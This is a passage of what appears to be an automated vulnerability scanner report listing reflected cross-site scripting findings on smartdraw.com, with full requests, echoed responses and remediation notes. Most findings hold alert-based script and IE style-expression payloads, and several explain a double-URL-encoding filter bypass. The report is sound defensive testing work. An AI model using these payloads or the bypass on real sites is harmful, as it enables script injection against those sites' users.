Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iffsvl2yty0fiq3algupkl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/d00fd"style="x:expression(alert(1))"37b4fa705aa/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.208. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31 was submitted in the REST URL parameter 3. This input was echoed as 7ebb1"><script>alert(1)</script>7f63dfd6d31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/index.htm7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yawesm55knbvl4mobfmyjr2e; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8921
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo7ebb1"><script>alert(1)</script>7f63dfd6d31/?id=340836/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.209. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b was submitted in the REST URL parameter 3. This input was echoed as 579d3"><script>alert(1)</script>136f2be723b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:57 GMT
Content-Length: 8928
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fzzorg45tqhtbe455jbn02zs; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/579d3"><script>alert(1)</script>136f2be723b/?id=340836/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

3.210. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c was submitted in the REST URL parameter 1. This input was echoed as 81e6e"style="x:expression(alert(1))"30c796e241c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vgiqbgv2pky1le45ukty4wfj; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos81e6e"style="x:expression(alert(1))"30c796e241c/demo/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.211. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17 was submitted in the REST URL parameter 1. This input was echoed as 3f3f7"style="x:expression(alert(1))"704a7a40d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wupmsxznbmovt155mvmvxh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/3f3f7"style="x:expression(alert(1))"704a7a40d17/demo/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; he
...[SNIP]...

3.212. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a was submitted in the REST URL parameter 2. This input was echoed as 2addd"style="x:expression(alert(1))"108d415c1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ra0kk255lzz14izejoevse45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/2addd"style="x:expression(alert(1))"108d415c1a/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.213. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8 was submitted in the REST URL parameter 2. This input was echoed as 5ca5b"style="x:expression(alert(1))"1a726fc0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ygebeo553nhi5mztwrtyso45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo5ca5b"style="x:expression(alert(1))"1a726fc0e8/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.214. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 was submitted in the REST URL parameter 3. This input was echoed as 551b7"style="x:expression(alert(1))"8d874867177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/x22551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gtu5y445d4j1giqdn4l3bg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22551b7"style="x:expression(alert(1))"8d874867177/" rel="nofollow" target="_blank">
...[SNIP]...

3.215. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d was submitted in the REST URL parameter 3. This input was echoed as bd314"style="x:expression(alert(1))"9639797b41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w11nlueclbe1ry55ysywmpry; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/bd314"style="x:expression(alert(1))"9639797b41d/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.216. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 436c4"style="x:expression(alert(1))"7d96edb3e1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /videos/demo/x22?436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sxjxsy55v4wrlmeet1lslx45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22/?436c4"style="x:expression(alert(1))"7d96edb3e1d=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.217. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e581f"style="x:expression(alert(1))"3b6d10c18aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /videos/demo/x22?e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qlfc4j452c3dom55lvonz145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22/?e581f"style="x:expression(alert(1))"3b6d10c18aa=1" rel="nofollow" target="_blank">
...[SNIP]...

3.218. http://www.smartdraw.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a was submitted in the REST URL parameter 1. This input was echoed as 9bd6e"style="x:expression(alert(1))"b4a37af963a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4s50qr0kvr4fhux3xpku555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8683
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/9bd6e"style="x:expression(alert(1))"b4a37af963a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.219. http://www.smartdraw.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e was submitted in the REST URL parameter 1. This input was echoed as 2d4c3"style="x:expression(alert(1))"a464241924e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

